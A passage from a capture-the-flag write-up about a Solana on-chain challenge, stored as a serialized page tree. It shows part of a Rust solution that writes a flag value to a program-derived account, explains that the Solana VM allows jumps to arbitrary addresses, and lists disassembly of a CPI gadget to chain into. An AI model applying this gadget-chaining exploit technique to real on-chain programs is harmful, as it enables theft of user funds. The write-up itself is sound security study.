",{"type":24,"tag":301,"props":50327,"children":50328},{"style":348},[50329],{"type":30,"value":10819},{"type":24,"tag":301,"props":50331,"children":50332},{"style":359},[50333],{"type":30,"value":4656},{"type":24,"tag":301,"props":50335,"children":50336},{"class":303,"line":674},[50337,50341,50345,50349,50353,50357,50362,50366,50370,50374],{"type":24,"tag":301,"props":50338,"children":50339},{"style":359},[50340],{"type":30,"value":50295},{"type":24,"tag":301,"props":50342,"children":50343},{"style":385},[50344],{"type":30,"value":10308},{"type":24,"tag":301,"props":50346,"children":50347},{"style":314},[50348],{"type":30,"value":21913},{"type":24,"tag":301,"props":50350,"children":50351},{"style":359},[50352],{"type":30,"value":362},{"type":24,"tag":301,"props":50354,"children":50355},{"style":385},[50356],{"type":30,"value":772},{"type":24,"tag":301,"props":50358,"children":50359},{"style":369},[50360],{"type":30,"value":50361},"flag_pda_ai",{"type":24,"tag":301,"props":50363,"children":50364},{"style":385},[50365],{"type":30,"value":206},{"type":24,"tag":301,"props":50367,"children":50368},{"style":359},[50369],{"type":30,"value":50325},{"type":24,"tag":301,"props":50371,"children":50372},{"style":348},[50373],{"type":30,"value":10819},{"type":24,"tag":301,"props":50375,"children":50376},{"style":359},[50377],{"type":30,"value":4656},{"type":24,"tag":301,"props":50379,"children":50380},{"class":303,"line":692},[50381],{"type":24,"tag":301,"props":50382,"children":50383},{"style":359},[50384],{"type":30,"value":6867},{"type":24,"tag":301,"props":50386,"children":50387},{"class":303,"line":3631},[50388],{"type":24,"tag":301,"props":50389,"children":50390},{"style":359},[50391],{"type":30,"value":3788},{"type":24,"tag":301,"props":50393,"children":50394},{"class":303,"line":3639},[50395,50399],{"type":24,"tag":301,"props":50396,"children":50397},{"style":314},[50398],{"type":30,"value":47864},{"type":24,"tag":301,"props":50400,"children":50401},{"style":359},[50402],{"type":30,"value":1707},{"type":24,"tag":301,"props":50404,"children":50405},{"class":303,"line":3647},[50406,50410,50415],{"type":24,"tag":301,"props":50407,"children":50408},{"style":385},[50409],{"type":30,"value":10298},{"type":24,"tag":301,"props":50411,"children":50412},{"style":369},[50413],{"type":30,"value":50414},"instruction",{"type":24,"tag":301,"props":50416,"children":50417},{"style":359},[50418],{"type":30,"value":1729},{"type":24,"tag":301,"props":50420,"children":50421},{"class":303,"line":3685},[50422,50426],{"type":24,"tag":301,"props":50423,"children":50424},{"style":385},[50425],{"type":30,"value":10298},{"type":24,"tag":301,"props":50427,"children":50428},{"style":359},[50429],{"type":30,"value":50287},{"type":24,"tag":301,"props":50431,"children":50432},{"class":303,"line":3713},[50433,50438,50442,50446],{"type":24,"tag":301,"props":50434,"children":50435},{"style":369},[50436],{"type":30,"value":50437}," user_ai",{"type":24,"tag":301,"props":50439,"children":50440},{"style":385},[50441],{"type":30,"value":206},{"type":24,"tag":301,"props":50443,"children":50444},{"style":314},[50445],{"type":30,"value":22209},{"type":24,"tag":301,"props":50447,"children":50448},{"style":359},[50449],{"type":30,"value":10318},{"type":24,"tag":301,"props":50451,"children":50452},{"class":303,"line":3721},[50453,50458,50462,50466],{"type":24,"tag":301,"props":50454,"children":50455},{"style":369},[50456],{"type":30,"value":50457}," flag_pda_ai",{"type":24,"tag":301,"props":50459,"children":50460},{"style":385},[50461],{"type":30,"value":206},{"type":24,"tag":301,"props":50463,"children":50464},{"style":314},[50465],{"type":30,"value":22209},{"type":24,"tag":301,"props":50467,"children":50468},{"style":359},[50469],{"type":30,"value":10318},{"type":24,"tag":301,"props":50471,"children":50472},{"class":303,"line":3751},[50473],{"type":24,"tag":301,"props":50474,"children":50475},{"style":359},[50476],{"type":30,"value":6867},{"type":24,"tag":301,"props":50478,"children":50479},{"class":303,"line":3782},[50480,50484,50488,50492,50496,50500,50504,50508],{"type":24,"tag":301,"props":50481,"children":50482},{"style":385},[50483],{"type":30,"value":10298},{"type":24,"tag":301,"props":50485,"children":50486},{"style":359},[50487],{"type":30,"value":541},{"type":24,"tag":301,"props":50489,"children":50490},{"style":385},[50491],{"type":30,"value":556},{"type":24,"tag":301,"props":50493,"children":50494},{"style":359},[50495],{"type":30,"value":541},{"type":24,"tag":301,"props":50497,"children":50498},{"style":329},[50499],{"type":30,"value":49359},{"type":24,"tag":301,"props":50501,"children":50502},{"style":385},[50503],{"type":30,"value":206},{"type":24,"tag":301,"props":50505,"children":50506},{"style":314},[50507],{"type":30,"value":49368},{"type":24,"tag":301,"props":50509,"children":50510},{"style":359},[50511],{"type":30,"value":50512},"()]],\n",{"type":24,"tag":301,"props":50514,"children":50515},{"class":303,"line":3791},[50516,50520,50524],{"type":24,"tag":301,"props":50517,"children":50518},{"style":359},[50519],{"type":30,"value":10483},{"type":24,"tag":301,"props":50521,"children":50522},{"style":385},[50523],{"type":30,"value":2003},{"type":24,"tag":301,"props":50525,"children":50526},{"style":359},[50527],{"type":30,"value":492},{"type":24,"tag":301,"props":50529,"children":50530},{"class":303,"line":3819},[50531],{"type":24,"tag":301,"props":50532,"children":50533},{"emptyLinePlaceholder":16},[50534],{"type":30,"value":341},{"type":24,"tag":301,"props":50536,"children":50537},{"class":303,"line":4397},[50538],{"type":24,"tag":301,"props":50539,"children":50540},{"style":1062},[50541],{"type":30,"value":50542}," // Step 2: Write 0x4337 to the first 8 bytes of the account\n",{"type":24,"tag":301,"props":50544,"children":50545},{"class":303,"line":4405},[50546,50551,50555,50559,50563,50567,50571,50575,50579,50583,50587,50592,50596,50600,50605,50609,50613,50618],{"type":24,"tag":301,"props":50547,"children":50548},{"style":369},[50549],{"type":30,"value":50550}," flag_pda_ai",{"type":24,"tag":301,"props":50552,"children":50553},{"style":385},[50554],{"type":30,"value":206},{"type":24,"tag":301,"props":50556,"children":50557},{"style":314},[50558],{"type":30,"value":20667},{"type":24,"tag":301,"props":50560,"children":50561},{"style":359},[50562],{"type":30,"value":20672},{"type":24,"tag":301,"props":50564,"children":50565},{"style":385},[50566],{"type":30,"value":2003},{"type":24,"tag":301,"props":50568,"children":50569},{"style":359},[50570],{"type":30,"value":541},{"type":24,"tag":301,"props":50572,"children":50573},{"style":385},[50574],{"type":30,"value":9887},{"type":24,"tag":301,"props":50576,"children":50577},{"style":466},[50578],{"type":30,"value":10900},{"type":24,"tag":301,"props":50580,"children":50581},{"style":359},[50582],{"type":30,"value":22200},{"type":24,"tag":301,"props":50584,"children":50585},{"style":385},[50586],{"type":30,"value":206},{"type":24,"tag":301,"props":50588,"children":50589},{"style":314},[50590],{"type":30,"value":50591},"copy_from_slice",{"type":24,"tag":301,"props":50593,"children":50594},{"style":359},[50595],{"type":30,"value":362},{"type":24,"tag":301,"props":50597,"children":50598},{"style":385},[50599],{"type":30,"value":556},{"type":24,"tag":301,"props":50601,"children":50602},{"style":466},[50603],{"type":30,"value":50604},"0x4337",{"type":24,"tag":301,"props":50606,"children":50607},{"style":10246},[50608],{"type":30,"value":14857},{"type":24,"tag":301,"props":50610,"children":50611},{"style":385},[50612],{"type":30,"value":206},{"type":24,"tag":301,"props":50614,"children":50615},{"style":314},[50616],{"type":30,"value":50617},"to_le_bytes",{"type":24,"tag":301,"props":50619,"children":50620},{"style":359},[50621],{"type":30,"value":22214},{"type":24,"tag":301,"props":50623,"children":50624},{"class":303,"line":4422},[50625],{"type":24,"tag":301,"props":50626,"children":50627},{"emptyLinePlaceholder":16},[50628],{"type":30,"value":341},{"type":24,"tag":301,"props":50630,"children":50631},{"class":303,"line":4438},[50632,50636],{"type":24,"tag":301,"props":50633,"children":50634},{"style":10246},[50635],{"type":30,"value":21125},{"type":24,"tag":301,"props":50637,"children":50638},{"style":359},[50639],{"type":30,"value":21130},{"type":24,"tag":301,"props":50641,"children":50642},{"class":303,"line":4446},[50643],{"type":24,"tag":301,"props":50644,"children":50645},{"style":359},[50646],{"type":30,"value":698},{"type":24,"tag":32,"props":50648,"children":50649},{},[50650],{"type":30,"value":50651},"To test this theory, we can execute the program above inside the test environment, and see if we can get the flag:",{"type":24,"tag":32,"props":50653,"children":50654},{},[50655],{"type":24,"tag":177,"props":50656,"children":50659},{"alt":50657,"src":50658},"Screenshot","/posts/jumping-around-in-the-vm/screenshot.png",[],{"type":24,"tag":32,"props":50661,"children":50662},{},[50663],{"type":30,"value":50664},"It works! Now we \"just\" need to find a way to execute the program above, by leveraging the single Instruction call to the program. This is easier said than done. The next section will dive into the details of the Solana VM to understand how we can achieve this.",{"type":24,"tag":43,"props":50666,"children":50668},{"id":50667},"solution-implementation",[50669],{"type":30,"value":50670},"Solution Implementation",{"type":24,"tag":32,"props":50672,"children":50673},{},[50674,50676,50681],{"type":30,"value":50675},"Now that we know what we need to do, let's look at how we can actually do it. We have to code the above program, by chaining together multiple ",{"type":24,"tag":145,"props":50677,"children":50679},{"className":50678},[],[50680],{"type":30,"value":42425},{"type":30,"value":50682}," invocations:",{"type":24,"tag":291,"props":50684,"children":50688},{"className":50685,"code":50686,"language":50687,"meta":7,"style":7},"language-mermaid shiki shiki-themes slack-dark","graph LR\n A[0: entrypoint] --> B[1: process_instruction]\n B --> C[2: process]\n C --> D[3: gadget1]\n C --> E[3: process]\n E --> F[4: gadget2]\n E --> G[...]\n","mermaid",[50689],{"type":24,"tag":145,"props":50690,"children":50691},{"__ignoreMap":7},[50692,50700,50708,50716,50724,50732,50740],{"type":24,"tag":301,"props":50693,"children":50694},{"class":303,"line":304},[50695],{"type":24,"tag":301,"props":50696,"children":50697},{},[50698],{"type":30,"value":50699},"graph LR\n",{"type":24,"tag":301,"props":50701,"children":50702},{"class":303,"line":320},[50703],{"type":24,"tag":301,"props":50704,"children":50705},{},[50706],{"type":30,"value":50707}," A[0: entrypoint] --> B[1: process_instruction]\n",{"type":24,"tag":301,"props":50709,"children":50710},{"class":303,"line":335},[50711],{"type":24,"tag":301,"props":50712,"children":50713},{},[50714],{"type":30,"value":50715}," B --> C[2: process]\n",{"type":24,"tag":301,"props":50717,"children":50718},{"class":303,"line":344},[50719],{"type":24,"tag":301,"props":50720,"children":50721},{},[50722],{"type":30,"value":50723}," C --> D[3: gadget1]\n",{"type":24,"tag":301,"props":50725,"children":50726},{"class":303,"line":401},[50727],{"type":24,"tag":301,"props":50728,"children":50729},{},[50730],{"type":30,"value":50731}," C --> E[3: process]\n",{"type":24,"tag":301,"props":50733,"children":50734},{"class":303,"line":415},[50735],{"type":24,"tag":301,"props":50736,"children":50737},{},[50738],{"type":30,"value":50739}," E --> F[4: gadget2]\n",{"type":24,"tag":301,"props":50741,"children":50742},{"class":303,"line":439},[50743],{"type":24,"tag":301,"props":50744,"children":50745},{},[50746],{"type":30,"value":50747}," E --> G[...]\n",{"type":24,"tag":32,"props":50749,"children":50750},{},[50751],{"type":30,"value":50752},"What are those gadgets? The Solana VM does not enforce that the target of a jump is a valid one, meaning that it's possible to jump to arbitrary addresses!",{"type":24,"tag":32,"props":50754,"children":50755},{},[50756,50758,50764],{"type":30,"value":50757},"To mimic the execution of our solution, we need a gadget that lets us CPI into system_program, with parameters we control. How do we obtain those? We can use ",{"type":24,"tag":188,"props":50759,"children":50761},{"href":47223,"rel":50760},[192],[50762],{"type":30,"value":50763},"Binary Ninja",{"type":30,"value":50765}," to find a suitable gadget for this.",{"type":24,"tag":32,"props":50767,"children":50768},{},[50769,50771,50778],{"type":30,"value":50770},"Before throwing the on-chain program to binja, it's useful to find a way to get symbols for it. One solution is to patch the cargo-build-sbf command to ",{"type":24,"tag":188,"props":50772,"children":50775},{"href":50773,"rel":50774},"https://github.com/solana-labs/solana/blob/4ee5078e5ffdfff36d3f7920217788e2892c1a85/sdk/cargo-build-sbf/src/main.rs#L789",[192],[50776],{"type":30,"value":50777},"skip the strip pass",{"type":30,"value":206},{"type":24,"tag":80,"props":50780,"children":50782},{"id":50781},"cpi-gadget",[50783],{"type":30,"value":50784},"CPI Gadget",{"type":24,"tag":32,"props":50786,"children":50787},{},[50788,50790,50795,50797,50804,50806,50812],{"type":30,"value":50789},"Looking at the program source, one idea is to look for the cpi gadget around the ",{"type":24,"tag":145,"props":50791,"children":50793},{"className":50792},[],[50794],{"type":30,"value":45035},{"type":30,"value":50796}," function. This function calls into the solana sdk's function ",{"type":24,"tag":188,"props":50798,"children":50801},{"href":50799,"rel":50800},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L295-L310",[192],[50802],{"type":30,"value":50803},"invoke_signed_unchecked",{"type":30,"value":50805},", yielding a powerful gadget at the address ",{"type":24,"tag":145,"props":50807,"children":50809},{"className":50808},[],[50810],{"type":30,"value":50811},"0x100001ba8",{"type":30,"value":206},{"type":24,"tag":291,"props":50814,"children":50816},{"className":9818,"code":50815,"language":9817,"meta":7,"style":7},"solana_program::program::invoke_signed_unchecked\n100001ba8 79a278ff00000000 ldxdw r2, [r10-136] {var_88}\n100001bb0 79a380ff00000000 ldxdw r3, [r10-128] {var_80}\n100001bb8 79a468ff00000000 ldxdw r4, [r10-152] {var_98}\n100001bc0 79a570ff00000000 ldxdw r5, [r10-144] {var_90}\n100001bc8 8520000020100000 call sol_invoke_signed_rust\n100001bd0 5500040000000000 jne \u003C+4> r0, 0x0\n\n100001bd8 b701000018000000 mov r1, 0x18\n100001be0 79a288ff00000000 ldxdw r2, [r10-120] {var_78}\n100001be8 6312000000000000 stxw [r2-0], r1 {0x18}\n100001bf0 0500030000000000 ja \u003C+3>\n\n100001bf8 79a188ff00000000 ldxdw r1, [r10-120] {var_78}\n100001c00 bf02000000000000 mov r2, r0\n100001c08 8510000075000000 call _ZN94_$LT$solana_program...$u64$GT$$GT$4from17ha0d289b72861b06dE\n\n100001c10 79a2b8ff00000000 ldxdw r2, [r10-72] {var_48}\n100001c18 1502040000000000 jeq \u003C+4> r2, 0x0\n\n100001c20 2702000022000000 mul r2, 0x22\n100001c28 79a1b0ff00000000 ldxdw r1, [r10-80] {var_50}\n100001c30 b703000001000000 mov r3, 0x1\n100001c38 8510000003feffff call __rust_dealloc\n\n100001c40 79a2d0ff00000000 ldxdw r2, [r10-48] {var_30}\n100001c48 1502030000000000 jeq \u003C+3> r2, 0x0\n\n100001c50 79a1c8ff00000000 ldxdw r1, [r10-56] {var_38}\n100001c58 b703000001000000 mov r3, 0x1\n100001c60 85100000fefdffff call __rust_dealloc\n\n100001c68 9500000000000000 exit {__return_addr}\n",[50817],{"type":24,"tag":145,"props":50818,"children":50819},{"__ignoreMap":7},[50820,50845,50901,50952,51004,51056,51079,51127,51134,51166,51217,51274,51308,51315,51364,51394,51469,51476,51527,51573,51580,51611,51662,51692,51714,51721,51772,51817,51824,51875,51903,51924,51931],{"type":24,"tag":301,"props":50821,"children":50822},{"class":303,"line":304},[50823,50827,50831,50836,50840],{"type":24,"tag":301,"props":50824,"children":50825},{"style":359},[50826],{"type":30,"value":20447},{"type":24,"tag":301,"props":50828,"children":50829},{"style":385},[50830],{"type":30,"value":10308},{"type":24,"tag":301,"props":50832,"children":50833},{"style":359},[50834],{"type":30,"value":50835},"program",{"type":24,"tag":301,"props":50837,"children":50838},{"style":385},[50839],{"type":30,"value":10308},{"type":24,"tag":301,"props":50841,"children":50842},{"style":369},[50843],{"type":30,"value":50844},"invoke_signed_unchecked\n",{"type":24,"tag":301,"props":50846,"children":50847},{"class":303,"line":320},[50848,50853,50858,50863,50868,50873,50878,50882,50887,50892,50897],{"type":24,"tag":301,"props":50849,"children":50850},{"style":369},[50851],{"type":30,"value":50852},"100001ba8",{"type":24,"tag":301,"props":50854,"children":50855},{"style":369},[50856],{"type":30,"value":50857}," 79a278ff00000000",{"type":24,"tag":301,"props":50859,"children":50860},{"style":369},[50861],{"type":30,"value":50862}," ldxdw",{"type":24,"tag":301,"props":50864,"children":50865},{"style":369},[50866],{"type":30,"value":50867}," r2",{"type":24,"tag":301,"props":50869,"children":50870},{"style":359},[50871],{"type":30,"value":50872},", [",{"type":24,"tag":301,"props":50874,"children":50875},{"style":369},[50876],{"type":30,"value":50877},"r10",{"type":24,"tag":301,"props":50879,"children":50880},{"style":385},[50881],{"type":30,"value":9253},{"type":24,"tag":301,"props":50883,"children":50884},{"style":466},[50885],{"type":30,"value":50886},"136",{"type":24,"tag":301,"props":50888,"children":50889},{"style":359},[50890],{"type":30,"value":50891},"] {",{"type":24,"tag":301,"props":50893,"children":50894},{"style":369},[50895],{"type":30,"value":50896},"var_88",{"type":24,"tag":301,"props":50898,"children":50899},{"style":359},[50900],{"type":30,"value":698},{"type":24,"tag":301,"props":50902,"children":50903},{"class":303,"line":335},[50904,50909,50914,50918,50923,50927,50931,50935,50939,50943,50948],{"type":24,"tag":301,"props":50905,"children":50906},{"style":369},[50907],{"type":30,"value":50908},"100001bb0",{"type":24,"tag":301,"props":50910,"children":50911},{"style":369},[50912],{"type":30,"value":50913}," 79a380ff00000000",{"type":24,"tag":301,"props":50915,"children":50916},{"style":369},[50917],{"type":30,"value":50862},{"type":24,"tag":301,"props":50919,"children":50920},{"style":369},[50921],{"type":30,"value":50922}," r3",{"type":24,"tag":301,"props":50924,"children":50925},{"style":359},[50926],{"type":30,"value":50872},{"type":24,"tag":301,"props":50928,"children":50929},{"style":369},[50930],{"type":30,"value":50877},{"type":24,"tag":301,"props":50932,"children":50933},{"style":385},[50934],{"type":30,"value":9253},{"type":24,"tag":301,"props":50936,"children":50937},{"style":466},[50938],{"type":30,"value":2060},{"type":24,"tag":301,"props":50940,"children":50941},{"style":359},[50942],{"type":30,"value":50891},{"type":24,"tag":301,"props":50944,"children":50945},{"style":369},[50946],{"type":30,"value":50947},"var_80",{"type":24,"tag":301,"props":50949,"children":50950},{"style":359},[50951],{"type":30,"value":698},{"type":24,"tag":301,"props":50953,"children":50954},{"class":303,"line":344},[50955,50960,50965,50969,50974,50978,50982,50986,50991,50995,51000],{"type":24,"tag":301,"props":50956,"children":50957},{"style":369},[50958],{"type":30,"value":50959},"100001bb8",{"type":24,"tag":301,"props":50961,"children":50962},{"style":369},[50963],{"type":30,"value":50964}," 79a468ff00000000",{"type":24,"tag":301,"props":50966,"children":50967},{"style":369},[50968],{"type":30,"value":50862},{"type":24,"tag":301,"props":50970,"children":50971},{"style":369},[50972],{"type":30,"value":50973}," r4",{"type":24,"tag":301,"props":50975,"children":50976},{"style":359},[50977],{"type":30,"value":50872},{"type":24,"tag":301,"props":50979,"children":50980},{"style":369},[50981],{"type":30,"value":50877},{"type":24,"tag":301,"props":50983,"children":50984},{"style":385},[50985],{"type":30,"value":9253},{"type":24,"tag":301,"props":50987,"children":50988},{"style":466},[50989],{"type":30,"value":50990},"152",{"type":24,"tag":301,"props":50992,"children":50993},{"style":359},[50994],{"type":30,"value":50891},{"type":24,"tag":301,"props":50996,"children":50997},{"style":369},[50998],{"type":30,"value":50999},"var_98",{"type":24,"tag":301,"props":51001,"children":51002},{"style":359},[51003],{"type":30,"value":698},{"type":24,"tag":301,"props":51005,"children":51006},{"class":303,"line":401},[51007,51012,51017,51021,51026,51030,51034,51038,51043,51047,51052],{"type":24,"tag":301,"props":51008,"children":51009},{"style":369},[51010],{"type":30,"value":51011},"100001bc0",{"type":24,"tag":301,"props":51013,"children":51014},{"style":369},[51015],{"type":30,"value":51016}," 79a570ff00000000",{"type":24,"tag":301,"props":51018,"children":51019},{"style":369},[51020],{"type":30,"value":50862},{"type":24,"tag":301,"props":51022,"children":51023},{"style":369},[51024],{"type":30,"value":51025}," r5",{"type":24,"tag":301,"props":51027,"children":51028},{"style":359},[51029],{"type":30,"value":50872},{"type":24,"tag":301,"props":51031,"children":51032},{"style":369},[51033],{"type":30,"value":50877},{"type":24,"tag":301,"props":51035,"children":51036},{"style":385},[51037],{"type":30,"value":9253},{"type":24,"tag":301,"props":51039,"children":51040},{"style":466},[51041],{"type":30,"value":51042},"144",{"type":24,"tag":301,"props":51044,"children":51045},{"style":359},[51046],{"type":30,"value":50891},{"type":24,"tag":301,"props":51048,"children":51049},{"style":369},[51050],{"type":30,"value":51051},"var_90",{"type":24,"tag":301,"props":51053,"children":51054},{"style":359},[51055],{"type":30,"value":698},{"type":24,"tag":301,"props":51057,"children":51058},{"class":303,"line":415},[51059,51064,51069,51074],{"type":24,"tag":301,"props":51060,"children":51061},{"style":369},[51062],{"type":30,"value":51063},"100001bc8",{"type":24,"tag":301,"props":51065,"children":51066},{"style":466},[51067],{"type":30,"value":51068}," 8520000020100000",{"type":24,"tag":301,"props":51070,"children":51071},{"style":369},[51072],{"type":30,"value":51073}," call",{"type":24,"tag":301,"props":51075,"children":51076},{"style":369},[51077],{"type":30,"value":51078}," sol_invoke_signed_rust\n",{"type":24,"tag":301,"props":51080,"children":51081},{"class":303,"line":439},[51082,51087,51092,51097,51101,51105,51109,51113,51118,51122],{"type":24,"tag":301,"props":51083,"children":51084},{"style":369},[51085],{"type":30,"value":51086},"100001bd0",{"type":24,"tag":301,"props":51088,"children":51089},{"style":466},[51090],{"type":30,"value":51091}," 5500040000000000",{"type":24,"tag":301,"props":51093,"children":51094},{"style":369},[51095],{"type":30,"value":51096}," jne",{"type":24,"tag":301,"props":51098,"children":51099},{"style":359},[51100],{"type":30,"value":3950},{"type":24,"tag":301,"props":51102,"children":51103},{"style":385},[51104],{"type":30,"value":11206},{"type":24,"tag":301,"props":51106,"children":51107},{"style":466},[51108],{"type":30,"value":1761},{"type":24,"tag":301,"props":51110,"children":51111},{"style":359},[51112],{"type":30,"value":12641},{"type":24,"tag":301,"props":51114,"children":51115},{"style":369},[51116],{"type":30,"value":51117},"r0",{"type":24,"tag":301,"props":51119,"children":51120},{"style":359},[51121],{"type":30,"value":377},{"type":24,"tag":301,"props":51123,"children":51124},{"style":466},[51125],{"type":30,"value":51126},"0x0\n",{"type":24,"tag":301,"props":51128,"children":51129},{"class":303,"line":447},[51130],{"type":24,"tag":301,"props":51131,"children":51132},{"emptyLinePlaceholder":16},[51133],{"type":30,"value":341},{"type":24,"tag":301,"props":51135,"children":51136},{"class":303,"line":476},[51137,51142,51147,51152,51157,51161],{"type":24,"tag":301,"props":51138,"children":51139},{"style":369},[51140],{"type":30,"value":51141},"100001bd8",{"type":24,"tag":301,"props":51143,"children":51144},{"style":369},[51145],{"type":30,"value":51146}," b701000018000000",{"type":24,"tag":301,"props":51148,"children":51149},{"style":369},[51150],{"type":30,"value":51151}," mov",{"type":24,"tag":301,"props":51153,"children":51154},{"style":369},[51155],{"type":30,"value":51156}," r1",{"type":24,"tag":301,"props":51158,"children":51159},{"style":359},[51160],{"type":30,"value":377},{"type":24,"tag":301,"props":51162,"children":51163},{"style":466},[51164],{"type":30,"value":51165},"0x18\n",{"type":24,"tag":301,"props":51167,"children":51168},{"class":303,"line":495},[51169,51174,51179,51183,51187,51191,51195,51199,51204,51208,51213],{"type":24,"tag":301,"props":51170,"children":51171},{"style":369},[51172],{"type":30,"value":51173},"100001be0",{"type":24,"tag":301,"props":51175,"children":51176},{"style":369},[51177],{"type":30,"value":51178}," 79a288ff00000000",{"type":24,"tag":301,"props":51180,"children":51181},{"style":369},[51182],{"type":30,"value":50862},{"type":24,"tag":301,"props":51184,"children":51185},{"style":369},[51186],{"type":30,"value":50867},{"type":24,"tag":301,"props":51188,"children":51189},{"style":359},[51190],{"type":30,"value":50872},{"type":24,"tag":301,"props":51192,"children":51193},{"style":369},[51194],{"type":30,"value":50877},{"type":24,"tag":301,"props":51196,"children":51197},{"style":385},[51198],{"type":30,"value":9253},{"type":24,"tag":301,"props":51200,"children":51201},{"style":466},[51202],{"type":30,"value":51203},"120",{"type":24,"tag":301,"props":51205,"children":51206},{"style":359},[51207],{"type":30,"value":50891},{"type":24,"tag":301,"props":51209,"children":51210},{"style":369},[51211],{"type":30,"value":51212},"var_78",{"type":24,"tag":301,"props":51214,"children":51215},{"style":359},[51216],{"type":30,"value":698},{"type":24,"tag":301,"props":51218,"children":51219},{"class":303,"line":504},[51220,51225,51230,51235,51239,51244,51248,51252,51256,51261,51266,51270],{"type":24,"tag":301,"props":51221,"children":51222},{"style":369},[51223],{"type":30,"value":51224},"100001be8",{"type":24,"tag":301,"props":51226,"children":51227},{"style":466},[51228],{"type":30,"value":51229}," 6312000000000000",{"type":24,"tag":301,"props":51231,"children":51232},{"style":369},[51233],{"type":30,"value":51234}," stxw",{"type":24,"tag":301,"props":51236,"children":51237},{"style":359},[51238],{"type":30,"value":29800},{"type":24,"tag":301,"props":51240,"children":51241},{"style":369},[51242],{"type":30,"value":51243},"r2",{"type":24,"tag":301,"props":51245,"children":51246},{"style":385},[51247],{"type":30,"value":9253},{"type":24,"tag":301,"props":51249,"children":51250},{"style":466},[51251],{"type":30,"value":584},{"type":24,"tag":301,"props":51253,"children":51254},{"style":359},[51255],{"type":30,"value":551},{"type":24,"tag":301,"props":51257,"children":51258},{"style":369},[51259],{"type":30,"value":51260},"r1",{"type":24,"tag":301,"props":51262,"children":51263},{"style":359},[51264],{"type":30,"value":51265}," {",{"type":24,"tag":301,"props":51267,"children":51268},{"style":466},[51269],{"type":30,"value":9124},{"type":24,"tag":301,"props":51271,"children":51272},{"style":359},[51273],{"type":30,"value":698},{"type":24,"tag":301,"props":51275,"children":51276},{"class":303,"line":512},[51277,51282,51287,51292,51296,51300,51304],{"type":24,"tag":301,"props":51278,"children":51279},{"style":369},[51280],{"type":30,"value":51281},"100001bf0",{"type":24,"tag":301,"props":51283,"children":51284},{"style":466},[51285],{"type":30,"value":51286}," 0500030000000000",{"type":24,"tag":301,"props":51288,"children":51289},{"style":369},[51290],{"type":30,"value":51291}," ja",{"type":24,"tag":301,"props":51293,"children":51294},{"style":359},[51295],{"type":30,"value":3950},{"type":24,"tag":301,"props":51297,"children":51298},{"style":385},[51299],{"type":30,"value":11206},{"type":24,"tag":301,"props":51301,"children":51302},{"style":466},[51303],{"type":30,"value":1447},{"type":24,"tag":301,"props":51305,"children":51306},{"style":359},[51307],{"type":30,"value":12812},{"type":24,"tag":301,"props":51309,"children":51310},{"class":303,"line":592},[51311],{"type":24,"tag":301,"props":51312,"children":51313},{"emptyLinePlaceholder":16},[51314],{"type":30,"value":341},{"type":24,"tag":301,"props":51316,"children":51317},{"class":303,"line":619},[51318,51323,51328,51332,51336,51340,51344,51348,51352,51356,51360],{"type":24,"tag":301,"props":51319,"children":51320},{"style":369},[51321],{"type":30,"value":51322},"100001bf8",{"type":24,"tag":301,"props":51324,"children":51325},{"style":369},[51326],{"type":30,"value":51327}," 79a188ff00000000",{"type":24,"tag":301,"props":51329,"children":51330},{"style":369},[51331],{"type":30,"value":50862},{"type":24,"tag":301,"props":51333,"children":51334},{"style":369},[51335],{"type":30,"value":51156},{"type":24,"tag":301,"props":51337,"children":51338},{"style":359},[51339],{"type":30,"value":50872},{"type":24,"tag":301,"props":51341,"children":51342},{"style":369},[51343],{"type":30,"value":50877},{"type":24,"tag":301,"props":51345,"children":51346},{"style":385},[51347],{"type":30,"value":9253},{"type":24,"tag":301,"props":51349,"children":51350},{"style":466},[51351],{"type":30,"value":51203},{"type":24,"tag":301,"props":51353,"children":51354},{"style":359},[51355],{"type":30,"value":50891},{"type":24,"tag":301,"props":51357,"children":51358},{"style":369},[51359],{"type":30,"value":51212},{"type":24,"tag":301,"props":51361,"children":51362},{"style":359},[51363],{"type":30,"value":698},{"type":24,"tag":301,"props":51365,"children":51366},{"class":303,"line":635},[51367,51372,51377,51381,51385,51389],{"type":24,"tag":301,"props":51368,"children":51369},{"style":369},[51370],{"type":30,"value":51371},"100001c00",{"type":24,"tag":301,"props":51373,"children":51374},{"style":369},[51375],{"type":30,"value":51376}," bf02000000000000",{"type":24,"tag":301,"props":51378,"children":51379},{"style":369},[51380],{"type":30,"value":51151},{"type":24,"tag":301,"props":51382,"children":51383},{"style":369},[51384],{"type":30,"value":50867},{"type":24,"tag":301,"props":51386,"children":51387},{"style":359},[51388],{"type":30,"value":377},{"type":24,"tag":301,"props":51390,"children":51391},{"style":369},[51392],{"type":30,"value":51393},"r0\n",{"type":24,"tag":301,"props":51395,"children":51396},{"class":303,"line":643},[51397,51402,51407,51411,51416,51420,51425,51429,51433,51438,51442,51446,51451,51456,51460,51464],{"type":24,"tag":301,"props":51398,"children":51399},{"style":369},[51400],{"type":30,"value":51401},"100001c08",{"type":24,"tag":301,"props":51403,"children":51404},{"style":466},[51405],{"type":30,"value":51406}," 8510000075000000",{"type":24,"tag":301,"props":51408,"children":51409},{"style":369},[51410],{"type":30,"value":51073},{"type":24,"tag":301,"props":51412,"children":51413},{"style":10246},[51414],{"type":30,"value":51415}," _ZN94_",{"type":24,"tag":301,"props":51417,"children":51418},{"style":385},[51419],{"type":30,"value":17093},{"type":24,"tag":301,"props":51421,"children":51422},{"style":10246},[51423],{"type":30,"value":51424},"LT",{"type":24,"tag":301,"props":51426,"children":51427},{"style":385},[51428],{"type":30,"value":17093},{"type":24,"tag":301,"props":51430,"children":51431},{"style":369},[51432],{"type":30,"value":20447},{"type":24,"tag":301,"props":51434,"children":51435},{"style":385},[51436],{"type":30,"value":51437},"...$",{"type":24,"tag":301,"props":51439,"children":51440},{"style":369},[51441],{"type":30,"value":14857},{"type":24,"tag":301,"props":51443,"children":51444},{"style":385},[51445],{"type":30,"value":17093},{"type":24,"tag":301,"props":51447,"children":51448},{"style":10246},[51449],{"type":30,"value":51450},"GT",{"type":24,"tag":301,"props":51452,"children":51453},{"style":385},[51454],{"type":30,"value":51455},"$$",{"type":24,"tag":301,"props":51457,"children":51458},{"style":10246},[51459],{"type":30,"value":51450},{"type":24,"tag":301,"props":51461,"children":51462},{"style":385},[51463],{"type":30,"value":17093},{"type":24,"tag":301,"props":51465,"children":51466},{"style":359},[51467],{"type":30,"value":51468},"4from17ha0d289b72861b06dE\n",{"type":24,"tag":301,"props":51470,"children":51471},{"class":303,"line":652},[51472],{"type":24,"tag":301,"props":51473,"children":51474},{"emptyLinePlaceholder":16},[51475],{"type":30,"value":341},{"type":24,"tag":301,